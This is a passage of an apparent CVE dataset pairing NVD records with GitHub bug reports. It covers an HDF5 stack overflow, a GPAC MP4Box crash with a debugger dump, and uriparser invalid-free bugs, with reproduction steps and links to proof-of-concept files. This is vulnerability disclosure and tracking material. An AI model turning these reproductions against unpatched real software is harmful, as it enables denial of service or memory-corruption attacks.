/home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_link.c:366 #24 0x5582bd5e75fe in H5VL__link_specific /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:5305 #25 0x5582bd5e75fe in H5VL_link_specific /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:5339 #26 0x5582bd2cec7f in H5L__iterate_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5L.c:1659 #27 0x5582bd2cec7f in H5Literate2 /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5L.c:1695 #28 0x5582bd01acc1 in link_iteration /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:614 #29 0x5582bd01acc1 in dump_group /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:886 #30 0x5582bd00f1e0 in main /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump.c:1547 #31 0x7ff7f59ae0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #32 0x5582bd01520d in _start (/home/zxq/CVE_testing/source/hdf5-add/hdf5/build/bin/h5dump+0x17c20d) Address 0x7ffc401ba928 is located in stack of thread T0 at offset 8472 in frame #0 0x5582bd691fbf in H5D__chunk_io_init /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1071 This frame has 35 object(s): [32, 33) 'bogus' (line 1166) [48, 56) 'udata' (line 1256) [80, 88) 'tmp_fchunk' (line 1809) [112, 120) 'chunk_points' (line 2151) [144, 152) 'tmp_count' (line 2152) [176, 200) 'iter_op' (line 1255) [240, 264) 'iter_op' (line 1297) [304, 336) 'is_partial_dim' (line 1615) [368, 624) 'file_dims' (line 1605) [688, 944) 'zeros' (line 1607) [1008, 1264) 'coords' (line 1609) [1328, 1584) 'end' (line 1610) [1648, 1904) 'scaled' (line 1611) [1968, 2224) 'curr_partial_clip' (line 1613) [2288, 2544) 'partial_dim_size' (line 1614) [2608, 2864) 'start_scaled' (line 1817) [2928, 3184) 'scaled' (line 1818) [3248, 3504) 'file_sel_start' (line 1987) [3568, 3824) 'file_sel_end' (line 1988) [3888, 4144) 'mem_sel_start' (line 1989) [4208, 4464) 'mem_sel_end' (line 1990) [4528, 4784) 'adjust' (line 1991) [4848, 5104) 'coords' (line 2036) [5168, 5424) 'chunk_adjust' (line 2037) [5488, 5744) 'mem_sel_start' (line 2140) [5808, 6064) 'mem_sel_end' (line 2141) [6128, 6392) 'old_offset' (line 1073) [6464, 6728) 'coords' (line 1520) [6800, 7064) 'sel_start' (line 1521) [7136, 7400) 'sel_end' (line 1522) [7472, 7736) 'sel_start' (line 1810) [7808, 8072) 'sel_end' (line 1811) [8144, 8408) 'start_coords' (line 1813) [8480, 8744) 'coords' (line 1814) <== Memory access at offset 8472 underflows this variable [8816, 9080) 'end' (line 1815) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1927 in H5D__create_chunk_file_map_hyper Shadow bytes around the buggy address: 0x10000802f4d0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000802f4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000802f4f0: 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 0x10000802f500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000802f510: 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 =>0x10000802f520: f2 f2 f2 f2 f2[f2]00 00 00 00 00 00 00 00 00 00 0x10000802f530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000802f540: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x10000802f550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000802f560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000802f570: 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3192859==ABORTING ```
stack-buffer-overflow at H5D__create_chunk_file_map_hyper /hdf5/src/H5Dchunk.c:1927
https://api.github.com/repos/HDFGroup/hdf5/issues/1313/comments
2
2021-12-18T13:08:16Z
2023-05-04T20:17:45Z
https://github.com/HDFGroup/hdf5/issues/1313
1,083,829,532
1,313
2,943
CVE-2021-46038
2022-01-05T23:15:08.947
A Pointer Dereference vulnerability exists in GPAC 1.0.1 in unlink_chunk.isra, which causes a Denial of Service (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2000" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2000" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2000
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version ``` **command:** ``` ./bin/gcc/MP4Box -hint POC2 ``` [POC2.zip](https://github.com/gpac/gpac/files/7763677/POC2.zip) **Result** ``` segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff754da2f in unlink_chunk (p=p@entry=0x5555555e1480, av=0x7ffff76a0b80 <main_arena>) at malloc.c:1453 1453 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA [ REGISTERS ] RAX 0x14000007a0 RBX 0x7ffff76a0b80 (main_arena) ◂— 0x0 RCX 0x14000007a5 RDX 0x7ffff76a10b0 (main_arena+1328) —▸ 0x7ffff76a10a0 (main_arena+1312) —▸ 0x7ffff76a1090 (main_arena+1296) —▸ 0x7ffff76a1080 (main_arena+1280) —▸ 0x7ffff76a1070 (main_arena+1264) ◂— ... RDI 0x5555555e1480 ◂— 0x8013f76a1f74 RSI 0x4000 R8 0x7ffff76a0c10 (main_arena+144) —▸ 0x7ffff76a0c00 (main_arena+128) —▸ 0x5555555e0f10 ◂— 0x1400000014 R9 0x0 R10 0x7ffff7e0e94e ◂— ' but no data reference entry found\n' R11 0x7ffff76a0be0 (main_arena+96) —▸ 0x5555555e69e0 ◂— 0x0 R12 0x1400000760 R13 0x40 R14 0x14000007a0 R15 0x2 RBP 0x38 RSP 0x7fffffff7e30 —▸ 0x5555555e2a00 ◂— 0x1473746383 RIP 0x7ffff754da2f (unlink_chunk.isra+15) ◂— cmp rax, qword ptr [rdi + rax] [ DISASM ] ► 0x7ffff754da2f <unlink_chunk.isra+15> cmp rax, qword ptr [rdi + rax] 0x7ffff754da33 <unlink_chunk.isra+19> jne unlink_chunk.isra+191 <unlink_chunk.isra+191> ↓ 0x7ffff754dadf <unlink_chunk.isra+191> lea rdi, [rip + 0x11f954] 0x7ffff754dae6 <unlink_chunk.isra+198> call malloc_printerr <malloc_printerr> 0x7ffff754daeb <unlink_chunk.isra+203> lea rdi, [rip + 0x123756] 0x7ffff754daf2 <unlink_chunk.isra+210> call malloc_printerr <malloc_printerr> 0x7ffff754daf7 nop word ptr [rax + rax] 0x7ffff754db00 <malloc_consolidate> push r15 0x7ffff754db02 <malloc_consolidate+2> lea rax, [rdi + 0x60] 0x7ffff754db06 <malloc_consolidate+6> mov r15, rdi 0x7ffff754db09 <malloc_consolidate+9> push r14 [ STACK ] 00:0000│ rsp 0x7fffffff7e30 —▸ 0x5555555e2a00 ◂— 0x1473746383 01:0008│ 0x7fffffff7e38 —▸ 0x7ffff7550773 (_int_malloc+2947) ◂— cmp r12, 0x1f 02:0010│ 0x7fffffff7e40 —▸ 0x5555555e1480 ◂— 0x8013f76a1f74 03:0018│ 0x7fffffff7e48 —▸ 0x7ffff76a0be0 (main_arena+96) —▸ 0x5555555e69e0 ◂— 0x0 04:0020│ 0x7fffffff7e50 —▸ 0x7fffffff7e60 ◂— 0x38 /* '8' */ 05:0028│ 0x7fffffff7e58 ◂— 0xdab84f8dc31ec400 06:0030│ 0x7fffffff7e60 ◂— 0x38 /* '8' */ 07:0038│ 0x7fffffff7e68 ◂— 0x4 [ BACKTRACE ] ► f 0 0x7ffff754da2f unlink_chunk.isra+15 f 1 0x7ffff7550773 _int_malloc+2947 f 2 0x7ffff75522d4 malloc+116 f 3 0x7ffff78c17d2 co64_box_new+18 f 4 0x7ffff78f8aa9 gf_isom_box_new+153 f 5 0x7ffff791009c shift_chunk_offsets.part+284 f 6 0x7ffff79103a7 inplace_shift_moov_meta_offsets+231 f 7 0x7ffff7910e3c inplace_shift_mdat+732 ```
untrusted pointer dereference in unlink_chunk.isra
https://api.github.com/repos/gpac/gpac/issues/2000/comments
1
2021-12-22T15:49:42Z
2022-01-03T11:23:08Z
https://github.com/gpac/gpac/issues/2000
1,086,958,167
2,000
2,944
CVE-2021-46141
2022-01-06T04:15:06.917
An issue was discovered in uriparser before 0.9.6. It performs invalid free operations in uriFreeUriMembers and uriMakeOwner.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://blog.hartwork.org/posts/uriparser-096-with-security-fixes-released/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/issues/121" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/pull/124" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/01/msg00029.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MO6T7WA27H7K3WI2AXUAGPWBGK4HM65D/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YGIJTDNEMU2V4H3JJBQVKBRHU5GBQKG2/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5063" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://blog.hartwork.org/posts/uriparser-096-with-security-fixes-released/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/issues/121" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/pull/124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/01/msg00029.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MO6T7WA27H7K3WI2AXUAGPWBGK4HM65D/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YGIJTDNEMU2V4H3JJBQVKBRHU5GBQKG2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5063" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uriparser_project:uriparser:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDD115F5-6128-4317-AC92-F0714B9C8E8A", "versionEndExcluding": "0.9.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "BB176AC3-3CDA-4DDA-9089-C67B2F73AA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:factory:-:*:*:*:*:*:*:*", "matchCriteriaId": "E29492E1-43D8-43BF-94E3-26A762A66FAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:backports:sle-15:*:*:*:*:*:*:*", "matchCriteriaId": "1CBC4824-9D9F-427D-87A6-60B2CEBAAFEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.3:*:*:*:*:*:*:*", "matchCriteriaId": "090F0D1A-6BF8-4810-8942-3FFE4FBF7FE0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/uriparser/uriparser/issues/121
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "uriparser", "uriparser" ]
A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test-code"TestNormalizeSyntaxMaskRequired" _*crash log* ``` ==2151==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004d9be0 (pc 0x00000041ca94 bp 0x000000000000 sp 0x7fff34437d00 T0) ==2151==The signal is caused by a WRITE memory access. #0 0x41ca94 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType) #1 0x493d41 in free #2 0x4c6892 in (anonymous namespace)::countingFree(UriMemoryManagerStruct*, void*) #3 0x7fca1c05a4b2 in uriNormalizeSyntaxExMmA_ ``` Steps to reproduce: 1. git clone https://github.com/uriparser/uriparser.git 2. cd uriparser & mkdir build & cd build 3. Build cmake -DCMAKE_BUILD_TYPE=Release -DURIPARSER_BUILD_DOCS:BOOL=OFF -DBUILD_SHARED_LIBS:BOOL=ON .. make -j8 4. Download the attached file(1.cpp) 5. Build TEST CODE (1.cpp) clang++ -g -fsanitize=address,fuzzer-no-link -o 1 1.cpp -I uriparser/include/ -Luriparser/build -luriparser 6. Run LD_LIBRARY_PATH=uriparser/build/ ./1 OS:ubuntu 18.04 [uriparser_poc1.tar.gz](https://github.com/uriparser/uriparser/files/7249388/uriparser_poc1.tar.gz)
[CVE-2021-46141] .hostText memory is not properly duped/freed in uriNormalizeSyntax*, uriMakeOwner*, uriFreeUriMembers* for some URIs
https://api.github.com/repos/uriparser/uriparser/issues/121/comments
11
2021-09-29T06:35:00Z
2022-01-06T15:33:24Z
https://github.com/uriparser/uriparser/issues/121
1,010,548,738
121
2,945
CVE-2021-46142
2022-01-06T04:15:06.967
An issue was discovered in uriparser before 0.9.6. It performs invalid free operations in uriNormalizeSyntax.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://blog.hartwork.org/posts/uriparser-096-with-security-fixes-released/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/issues/122" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/pull/124" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MO6T7WA27H7K3WI2AXUAGPWBGK4HM65D/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YGIJTDNEMU2V4H3JJBQVKBRHU5GBQKG2/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5063" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://blog.hartwork.org/posts/uriparser-096-with-security-fixes-released/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/uriparser/uriparser/pull/124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MO6T7WA27H7K3WI2AXUAGPWBGK4HM65D/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YGIJTDNEMU2V4H3JJBQVKBRHU5GBQKG2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5063" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uriparser_project:uriparser:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDD115F5-6128-4317-AC92-F0714B9C8E8A", "versionEndExcluding": "0.9.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "BB176AC3-3CDA-4DDA-9089-C67B2F73AA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:factory:-:*:*:*:*:*:*:*", "matchCriteriaId": "E29492E1-43D8-43BF-94E3-26A762A66FAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:backports:sle-15:*:*:*:*:*:*:*", "matchCriteriaId": "1CBC4824-9D9F-427D-87A6-60B2CEBAAFEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.3:*:*:*:*:*:*:*", "matchCriteriaId": "090F0D1A-6BF8-4810-8942-3FFE4FBF7FE0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/uriparser/uriparser/issues/122
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "uriparser", "uriparser" ]
A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test-code"NormalizeSyntaxExMm" _*crash log* ``` ==3440==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004d9be0 (pc 0x00000041ca94 bp 0x000000000000 sp 0x7ffd2468e6e0 T0) ==3440==The signal is caused by a WRITE memory access. #0 0x41ca94 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType) #1 0x493d41 in free #2 0x4c6892 in (anonymous namespace)::countingFree(UriMemoryManagerStruct*, void*) #3 0x7faf2e1ac4b2 in uriNormalizeSyntaxExMmA_ ``` Steps to reproduce: 1. git clone https://github.com/uriparser/uriparser.git 2. cd uriparser & mkdir build & cd build 3. Build cmake -DCMAKE_BUILD_TYPE=Release -DURIPARSER_BUILD_DOCS:BOOL=OFF -DBUILD_SHARED_LIBS:BOOL=ON .. make -j8 4. Download the attached file(2.cpp) 5. Build TEST CODE (2.cpp) clang++ -g -fsanitize=address,fuzzer-no-link -o 2 2.cpp -I uriparser/include/ -I uriparser/ -Luriparser/build -luriparser 6. Run LD_LIBRARY_PATH=uriparser/build/ ./2 OS:ubuntu 18.04 [uriparser_poc2.tar.gz](https://github.com/uriparser/uriparser/files/7249420/uriparser_poc2.tar.gz)
[CVE-2021-46142] uriNormalizeSyntax* may free stack memory in out-of-memory situation when handling URIs containing empty segments
https://api.github.com/repos/uriparser/uriparser/issues/122/comments
5
2021-09-29T06:38:40Z
2022-01-06T15:30:41Z
https://github.com/uriparser/uriparser/issues/122
1,010,551,334
122
2,946
CVE-2021-46143
2022-01-06T04:15:07.017
In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.
